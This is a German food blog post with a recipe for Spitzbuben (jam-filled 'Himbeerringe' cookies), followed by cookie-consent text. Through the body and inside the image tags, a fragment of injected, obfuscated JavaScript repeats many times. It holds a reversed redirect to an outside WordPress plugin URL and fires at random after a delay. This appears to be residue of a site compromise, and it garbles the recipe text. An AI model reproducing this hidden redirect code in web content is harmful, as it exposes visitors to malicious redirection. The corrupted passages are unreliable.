Himbeerringe (Spitzbuben)

Posted on - Sonntag, der 6. Dezember 2015 / Author - FraeuleinStreusel / Category - Blog, cookies, Geschenk, Kekse, Weihnachten

Himbeerringe Spitzbuben von Fräulein Streusel aus Berlin

Lange kannte ich diese toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollen Plätzchen nur unter dem Namen „Himbeerringe“, aber wenn wir es ganz genau nehmen, heißen sie natürlich „Spitzbuben“.

Ich nenne sie einfach heimlich weiter Himbeerringe, auch, und das macht es eigentlich noch verrückter, wenn ich diese Himbeerringe noch nie mit Himbeergelee zubereitet habe, sondern gerne schwarze Johannisbeere nehme.

Aber das ist auch das Schöne an diesen Johannisbeer-Himbeerring-Spitzbuben, Ihr könnt auch jedes andere Gelee nehmen, oder die eine Hälfte mit Himbeer und die andere mit Orangengelee füllen. Was Ihr am Liebsten mögt.

Zutaten:
500 g Mehl
120 g Zucker
1 Prise Salz
abgeriebene Schale von einer Zitrone
1 Pck Vanille-Zucker
1 Eigelb
2cl Rum
250 g Butter

Himbeergelee (oder schwarze Johannisbeere, oder Kirsche oder Orange oder..)
Puderzucker zum Bestäuben

Zuerst das Mehl auf die Arbeitsfläche sieben. In die Mitte eine Vertiefung drücken und Zucker, Salz, Zitronenschale, Vanille-Zucker, Eigelb und den Rum hineingeben.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-30.11.15-18-58-43-e1449405430187.jpg“>toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-30.11.15-18-58-43-1024×768.jpg“ alt=“Spitzbuben Teigzubereitung Fräulein Streusel“ width=“1000″ height=“750″ />
Die Butter in Flöckchen auf den Mehlrand setzen. Alles gut zu einem Mürbeteig verkneten und den Teig, in Folie gewickelt, über Nacht in den Kühlschrank legen. (Ich lasse ihn oft auch nur eine Stunde im Kühlschrank ruhen, funktioniert genauso gut.)

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-30.11.15-19-07-07-e1449405484552.jpg“>toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-30.11.15-19-07-07-1024×768.jpg“ alt=“Fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to 30.11.15, 19 07 07″ width=“1000″ height=“750″ />
Den Teig auf der bemehlten Arbeitsfläche ausrollen. Nun aus der Hälfte des Teigs runde Plätzchen, aus der anderen Hälfte ein Plätzchen mit Loch ausstechen. Ich habe spezielle Ausstechförmchen für die Spitzbübchen, so dass ich für die „Loch“-Hälften einen Einsatz in die Forme stecken kann, so dass ich entweder ein Plätzchen mit Herz-Loch, Stern-Loch u.Ä. ausstechen kann.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-30.11.15-22-12-59-e1449405549192.jpg“>toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-30.11.15-22-12-59-1024×768.jpg“ alt=“Spitzbuben von Fräulein Streusel“ width=“1000″ height=“750″ />

Die ausgestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tochenen Plätzchen im vorgeheizten Backofen (Heißluft 180° Grad, Umluft 160° Grad) etwa 10-15 Minuten backen. Ihr bekommt schnell ein Gefühl dafür, wie lange die richtige Zeit bei Eurem Backofen ist. Sie sollten nicht zu braun werden.
Nun die Plätzchen abkühlen lassen und das Fruchtgelee bei schwacher Hitze glattrühren. Wenn es zu flüssig ist, dann einfach noch ein bisschen rühren und kurz abwarten, allerdings nicht wieder ganz abkühlen lassen.
Nun die abgekühlten Plätzchen mit einem Klacks Gelee bestreichen und den „Deckel“ (also die Hälfte mit dem Loch) oben drauf setzen und alles nochmal gut abkühlen und trocknen lassen, damit das Gelee nicht wieder verschmiert. Zum Schluss könnte Ihr die Plätzchen noch leicht mit Puderzucker bestäuben. Fertig :-).

Spitzbuben von Fräulein Streusel

P.S.: Falls Ihr vor dem Füllen mit dem Gelee schon mal ein Plätzchen naschen solltet, dann wundert Eucht nicht, wenn sie vielleicht noch etwas spröde, sandig schmecken. Sobald Ihr sie mit Gelee gefüllt habt, und sie eine Nacht in der Dose durchgezogen haben, sind sie überhaupt nicht mehr sandig, sondern haben sich schön fruchtig mit der Füllung verbunden. Erst dann schmecken sie auch am Besten.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-03.12.15-16-05-04-e1449405738973.jpg“>toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-03.12.15-16-05-04-1024×768.jpg“ alt=“Spitzbuben mit schwarzer Johannisbeere“ width=“1000″ height=“750″ />

Schlagwörter: , , , , , ,

Comments 0 comments to this post

Send me a message

Cookie-Einstellung

Bitte treffen Sie eine Auswahl. Weitere Informationen zu den Auswirkungen Ihrer Auswahl finden Sie unter Hilfe.

Treffen Sie eine Auswahl um fortzufahren

Ihre Auswahl wurde gespeichert!

Hilfe

Hilfe

Um fortfahren zu können, müssen Sie eine Cookie-Auswahl treffen. Nachfolgend erhalten Sie eine Erläuterung der verschiedenen Optionen und ihrer Bedeutung.

  • Alle Cookies zulassen:
    Jedes Cookie wie z.B. Tracking- und Analytische-Cookies.
  • Nur First-Party-Cookies zulassen:
    Nur Cookies von dieser Webseite.
  • Keine Cookies zulassen:
    Es werden keine Cookies gesetzt, es sei denn, es handelt sich um technisch notwendige Cookies.

Sie können Ihre Cookie-Einstellung jederzeit hier ändern: [:de]Datenschutzerklärung[:en]Privacy Police[:]. [:de]Impressum[:en]Imprint[:]

Zurück